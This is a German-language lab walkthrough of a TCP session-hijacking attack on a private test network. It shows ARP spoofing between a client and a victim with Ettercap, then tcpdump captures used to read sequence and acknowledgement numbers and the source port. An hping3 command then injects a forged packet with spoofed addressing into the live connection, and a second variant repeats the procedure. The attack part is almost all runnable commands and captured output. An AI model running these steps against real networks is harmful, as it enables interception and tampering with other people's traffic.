Vorraussetzung

• Arpspoofing mit Ettercap

Versuchsaufbau

• CLIENT=10.0.10.103
• OPFER=10.0.10.104
• ANGREIFER=10.0.10.101
• DSTPORT=2020

Angreifer

Auf Angreifer brauchen wir 2 Terminals

Terminal 1

Variablen setzen

• CLIENT=10.0.10.103
• OPFER=10.0.10.104
• ANGREIFER=10.0.10.101
• DSTPORT=2020

Arp Spoofing

• ettercap -Tq -i eth0 -M arp /$CLIENT,$OPFER// /$OPFER,$CLIENT//

Terminal 2

Variablen setzen

• CLIENT=10.0.10.103
• OPFER=10.0.10.104
• ANGREIFER=10.0.10.101
• DSTPORT=2020

TCPDUMP

• tcpdump -ni eth0 -S host 10.0.10.104 and tcp

Wir suchen SEQ, ACK und SRCPORT

OPFER

• nc -lp 2020

CLIENT

• nc 10.0.10.104 2020

ANGREIFER

TERMINAL 2

• tcpdump -ni eth0 -S host 10.0.10.104 and tcp

• tcpdump: verbose output suppressed, use -v[v]... for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

15:32:57.007020 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [S], seq 1196642424, win 64240, options [mss 1460,sackOK,TS val 783051844 ecr 0,nop,wscale 7], length 0

15:32:57.014293 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [S], seq 1196642424, win 64240, options [mss 1460,sackOK,TS val 783051844 ecr 0,nop,wscale 7], length 0

15:32:57.014686 IP 10.0.10.104.2020 > 10.0.10.103.53730: Flags [S.], seq 3707523260, ack 1196642425, win 28960, options [mss 1460,sackOK,TS val 1977650 ecr 783051844,nop,wscale 7], length 0

15:32:57.022274 IP 10.0.10.104.2020 > 10.0.10.103.53730: Flags [S.], seq 3707523260, ack 1196642425, win 28960, options [mss 1460,sackOK,TS val 1977650 ecr 783051844,nop,wscale 7], length 0

15:32:57.022652 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [.], ack 3707523261, win 502, options [nop,nop,TS val 783051859 ecr 1977650], length 0

15:32:57.030231 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [.], ack 3707523261, win 502, options [nop,nop,TS val 783051859 ecr 1977650], length 0

Wir brechen ab mit CTRL-C

Weitere Variablen setzen

• SEQ=1196642425
• ACK=3707523261
• SRCPORT=53730

Payload generieren

• echo "hallo tux" > data.dat

hping3 injection bauen

• hping3 -a $CLIENT-s $SRCPORT -p $DSTPORT -A -d 10 -E data.dat -c 1 -M $SEQ -L $ACK $OPFER

Links

• https://www.rationallyparanoid.com/articles/hping.html
• http://www.eggdrop.ch/texts/hping/#2_1
• http://0daysecurity.com/articles/hping3_examples.html
• http://maintain-under-the-radar.org/index.php/security/terminologie/scannen-von-netzwerken

Angreifer

fenster client eins

tcpdump

cardassia ~ # tcpdump -ni lan  -S port 2020
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes

fenster client zwei

client

thomas.will@cardassia ~ $ nc 192.168.244.52  2020

fenster client eins

cardassia ~ # tcpdump -ni lan  -S port 2020
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, options [mss 1460,sackOK,TS val 2268763 ecr 0,nop,wscale 7], length 0
15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, options [mss 1460,sackOK,TS val 193210349 ecr 2268763,nop,wscale 7], length 0
15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, options [nop,nop,TS val 2268763 ecr 193210349], length 0

fenster client drei

datei erstellen 10 bytes mit Umbruch

• echo "hallo tux" > data.dat
• hping3 -s $SRCPORT -p $DSTPORT -A -d 10 -E data.dat -c 1 -M 1758983239 -L 963043880 192.168.244.52

Links

• https://www.rationallyparanoid.com/articles/hping.html
• http://www.eggdrop.ch/texts/hping/#2_1
• http://0daysecurity.com/articles/hping3_examples.html
• http://maintain-under-the-radar.org/index.php/security/terminologie/scannen-von-netzwerken